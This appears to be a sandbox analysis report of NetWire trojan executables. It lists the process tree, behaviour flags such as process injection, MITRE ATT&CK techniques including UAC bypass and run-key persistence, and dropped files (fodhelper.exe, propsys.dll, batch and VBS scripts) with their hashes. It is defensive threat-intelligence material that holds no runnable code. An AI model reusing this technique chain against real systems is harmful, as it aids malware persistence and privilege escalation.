  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2284 /prefetch:1
  2⤵
  PID:9116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:8592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4856 /prefetch:8
  2⤵
  PID:8408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1716 /prefetch:1
  2⤵
  PID:5912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
  2⤵
  PID:5724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6160 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7632
- C:\Users\Admin\Downloads\NetWire (2).exe
  "C:\Users\Admin\Downloads\NetWire (2).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7820
- - C:\Users\Admin\Downloads\NetWire (2).exe
    "C:\Users\Admin\Downloads\NetWire (2).exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:6012
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:8216
- C:\Users\Admin\Downloads\NetWire (2).exe
  "C:\Users\Admin\Downloads\NetWire (2).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5380
- - C:\Users\Admin\Downloads\NetWire (2).exe
    "C:\Users\Admin\Downloads\NetWire (2).exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5712
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:6720
- C:\Users\Admin\Downloads\NetWire (2).exe
  "C:\Users\Admin\Downloads\NetWire (2).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4720
- - C:\Users\Admin\Downloads\NetWire (2).exe
    "C:\Users\Admin\Downloads\NetWire (2).exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4984
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:9192
- C:\Users\Admin\Downloads\NetWire (2).exe
  "C:\Users\Admin\Downloads\NetWire (2).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:9076
- - C:\Users\Admin\Downloads\NetWire (2).exe
    "C:\Users\Admin\Downloads\NetWire (2).exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:7692
- C:\Users\Admin\Downloads\NetWire (1).exe
  "C:\Users\Admin\Downloads\NetWire (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:8536
- - C:\Users\Admin\Downloads\NetWire (1).exe
    "C:\Users\Admin\Downloads\NetWire (1).exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:8356
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:5672
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3612
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7232
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:8688
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:8964
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5664

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3160

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2728

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x304
1⤵
PID:6912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eeaa8087eba2f63f31e599f6a7b46ef4

SHA1
f639519deee0766a39cfe258d2ac48e3a9d5ac03

SHA256
50fe80c9435f601c30517d10f6a8a0ca6ff8ca2add7584df377371b5a5dbe2d9

SHA512
eaabfad92c84f422267615c55a863af12823c5e791bdcb30cabe17f72025e07df7383cf6cf0f08e28aa18a31c2aac5985cf5281a403e22fbcc1fb5e61c49fc3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b9569e123772ae290f9bac07e0d31748

SHA1
5806ed9b301d4178a959b26d7b7ccf2c0abc6741

SHA256
20ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b

SHA512
cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6223d34c-3b7b-4ea8-b6c0-593cdb6b22fc.tmp

Filesize
6KB

MD5
de986a01359a1862441c9daa1cd240bf

SHA1
5375d8cce3e08c31b7eacf3ca47db88c1209aba2

SHA256
6a3eb3447fceab457ecc690ca4a1b8d134b3237551749fc5f14bbb1063bdb3dc

SHA512
e3c3ad617bd489f5d29530063b486cce7743d8988e71f2b0da722a8ab79cb8f2a6047bdbf12e0e0895673ff9edc6fd21636fe9a7168de1a5dcce249f237d956a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
cf97a8e5d04e7673c8064681966509e6

SHA1
f30c877d1b26298dd05b9ff8014f361c1daa770d

SHA256
7b03304270db7f81e41b702c4840819a29ecb8b70867ce927a67aa35f202d2a2

SHA512
0b3dbfcad6c3c315fb8e88e170243ecdbfdd2a754a4a061e75c614669ae4f624e30e3ce9bf2e00de560c5e7f8acea7b73e25b11fe1d4bc9fde96d4788c6b966e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
be85a012866f82533b134a3e7c03581c

SHA1
8f361377763dc0f643a3c2746149ca5850c5d8c0

SHA256
7c0534066657219aeecf9763515dbb8eeb5b0cc4509d25ed75d5347476f443a0

SHA512
38aa3dc3c36a5319162d52fb0bdb7588dfa9fada5247c49ee53d870b7d928ea5be1387e176e8caf3dd6cad9b6975d432eae587c0103f8dffc56f17ef887ae621

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9e2adeab0b6a91730cbf0e36b80daca2

SHA1
a781897f887716f3bd175d6269a8c2beb8ade7ef

SHA256
9b409a178eba9c252f30367b94400d6f50e4043e21da2cba79f051535324359d

SHA512
9a99153963c73e55472bd48f2f5b341e8667f1a279f49b034311b62de1477aed0758f342f69929377c3ba30d240362ff4c4b2e0eb3c6d1516b3520508e0881ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
328645d6cae83c0b1850d0ae1ff6f9f9

SHA1
bd75516b449471cfe3498e98f32eb111cd26e345

SHA256
bd0041c8709f32c1ae44884e8524d6da55130a48c3c8c678c68faf6e047d12c3

SHA512
11eef31cc535b29fe205d1cf7c0082b7017dda95e28c5adcb00eb39df01227c5c95402fc47a68bf2c6c64b2ca467bb7779fd5faaa3a55f5519322300bae2a781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1feb5c18efbab92e09b98983eee88969

SHA1
574253e0789cf56f2d976e4a1eaadd71e5747c2f

SHA256
a79411b5ed3231f166ce469dd32e3ecbe6a201497cef1745da64102bbf79c9fc

SHA512
99a481e3edae05a7d84b850d3fca02810442393faed7d67a688f5f1cbe6dffa4d1ec0ad244f3c7f26699bd859e4e0319a6d82842985c4888ad9127645991ad4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
126011907511f693d395270c0c1fb478

SHA1
e33ec9f42b05474ea5ba770d655e3ff0b789d855

SHA256
a4f57e28199ff29c7dc927bee504fbf90cc44823a0e918c586423822dd95d047

SHA512
f47d9782dc7c3de153efc5c0c37ff94467fe55da0083be440c34be2d932af51892597d1a126f6ce522f8ec96ec0e42f8b7c51921ebe3acd2818a49e9aaa0c0ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57e54f.TMP

Filesize
874B

MD5
9f3d71ef16bf05e64482e04e3a2dfa62

SHA1
0916f4523404dd08c1bb5950bd389a397a6a1fe8

SHA256
aec498f812c1b6ba1b9e4ec3894050680c829e8bbd3a306430739085e0f38ea1

SHA512
68f51083eecb2ca38a93f9ad46bfe6f7578c1595704834d7479764c525cf690ba7391e6463df6353312c61ccbe6325f8fa602baf68174d66659612027059e481

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
61a588cd5efab70e7cd964e524d9238d

SHA1
37fb11d12154b54acc7a04974c70acd54fc4a077

SHA256
82445ed732b140c008ce2de75a01127e33547577faa7f544f8fc154736a5d98b

SHA512
cfc75d0999893c4ed1186ce9249cc2ae6924c23cc1232addef523d2ae1859b1907bc80d14bb0dc92b7e899a16b5f51b95f26871637fee5653428710daba60fb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
aa81a39e881ffc8e785c31b2fb8fa614

SHA1
86ea89f40acf1c2639a3a4fe892be6675d599f49

SHA256
9ab78b17dd895622ad1273a47c256e5ab47065287c9bc71632ece7b4d2c86ede

SHA512
69a2e3715bdb12ca3943e6c3309f60db073d2ab70e968cc5f97c267a8593f50cee69e5a35b2652bc1e89a9192392588c61f16a2dc45bd7119f2fe7e2566bf5af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
7f16df3544803b1277bcc5fd3ae79843

SHA1
1c5c577b13b0ffe979834b9c506683dd663d64a3

SHA256
3e75369abf3ac0b1d19127eb65c3ad66dbf528485a701a94fca99cbbcf3ed234

SHA512
a3e145f63bef0b96445be95ec40358fa127e146b232d560b5a64ede1b12ca1762f61ed5c5ef2d939a5f28d09f2ca8481a3473a6337021b7b27e693d9505df306

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxcejqur.elh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 915963.crdownload

Filesize
1.2MB

MD5
7621f79a7f66c25ad6c636d5248abeb9

SHA1
98304e41f82c3aee82213a286abdee9abf79bcce

SHA256
086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d

SHA512
59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd

Download Submit
C:\Users\Public\Natso.bat

Filesize
283B

MD5
5cc1682955fd9f5800a8f1530c9a4334

SHA1
e09b6a4d729f2f4760ee42520ec30c3192c85548

SHA256
5562cc607d2f698327efacc4a21bd079bb14a99b03e7a01b3c67f8440e341cb3

SHA512
80767263aad44c739236161d4338d5dd8b0b58613f22cd173c3e88ebf143220ee56bbf93ace69a07d3c2f00daff0adbaa8461a1d53d12699725395c931c43cb6

Download Submit
C:\Users\Public\Runex.bat

Filesize
226B

MD5
f6828e22e6abe87c624e4683fac5889b

SHA1
b93d63354d4ddb226dab90955576a6d2cad05ba0

SHA256
e1b1884353a51436f90dfed9f85ed9dd98fccfbd13dee7aa54fd901f77fe5e9c

SHA512
26afb36afcb3f286b85ebd72061e26f84c33075d3d0767cc93f50ec414a85838c86049e0c56ff43011d1a309b98ae355cbe412203429ac243010dc971ac81ec1

Download Submit
C:\Users\Public\cde.bat

Filesize
295B

MD5
b442a70fdba934a802a468446c697646

SHA1
fe28bd0ab4831dc3bd71b774bdfac829b8806a35

SHA256
c8dbdd9043f83f13287d442bcd98d06376d19a1d82f4e1dd4c9449f9b2ae0c7d

SHA512
47b6d6396db728ad358c8104632f2be9e305ae674f2b08d501a68cded63c462316cdd18e861d9d411958b1012aaac4620239ca6029db6112285a8e06134d1903

Download Submit
C:\Users\Public\fodhelper.exe

Filesize
46KB

MD5
7215c73ec1aae35b9e4b1f22c811f85c

SHA1
98551f5184691b65dceba531c4e4975d77cd25a5

SHA256
7e80da8d839dcf05e30317256460ed7a4ee25cab2750d768569aaab35e1e8c64

SHA512
b68eed48dbd32e485fd56b952e3e642f25f1eefe26ea533b13857e225272ee9668c39552284a438175a323d1685a80d9f878ef0637b5d928bb1e1ed1ac505d61

Download Submit
C:\Users\Public\propsys.dll

Filesize
108KB

MD5
487766bf2f0add388cb123d1ef7ece46

SHA1
766564c04d9e8a6745baa2ad28da5d68ad1d79bf

SHA256
fa5d5f9bd3a3aece8941e52a00d05db8910d3332f4f276bc03663c7944ae11cb

SHA512
3b5c285c4eb749c5e34405b38e146e9fc3fe28c535ee12c4e0f075e167768f37b588e50c2dbd43a27b67b11e7483ad51fcd6b6e7638059dd40bc303c664a8a7e

Download Submit
C:\Users\Public\x.bat

Filesize
36B

MD5
47b8b6e888806f25ee24e55a6b116262

SHA1
1fbb022a6c3183f21806c19230a8ad421df9a2ae

SHA256
61e8f32d99ac46e7eab3e976b0afcadc55ad837d696f0b2a003fe9cd4f34335e

SHA512
a240e3b7f1a529da2dba304786da101548a039306c63f28c34f60973319ba37564e51493d021cd2c2adae4eecd98e8d6dd80e8b46472a6f6e7d1b069d000317a

Download Submit
C:\Users\Public\x.vbs

Filesize
260B

MD5
70f4e3618d69b36ca74f412ac75ec1fa

SHA1
59fb651c5c976c86f3e02811b0250ca7dc10eb3a

SHA256
c120ecbb33c2092fe379bcd2edbd702ea0a571ec99c233f8441e70e8ac62efd9

SHA512
fa4aa79f35d4d5999f5237aaf46314a2de0c88ba8ea3c4a33be50fbeb53d9bb201033965e4aee17be13081a082daaaed3aae5c84181f24e9723b762a453bf191

Download Submit
memory/644-269-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/644-270-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/2520-8380-0x000001F1F9240000-0x000001F1F9262000-memory.dmp

Filesize
136KB

Download
memory/2868-268-0x0000000010410000-0x000000001047E000-memory.dmp

Filesize
440KB

Download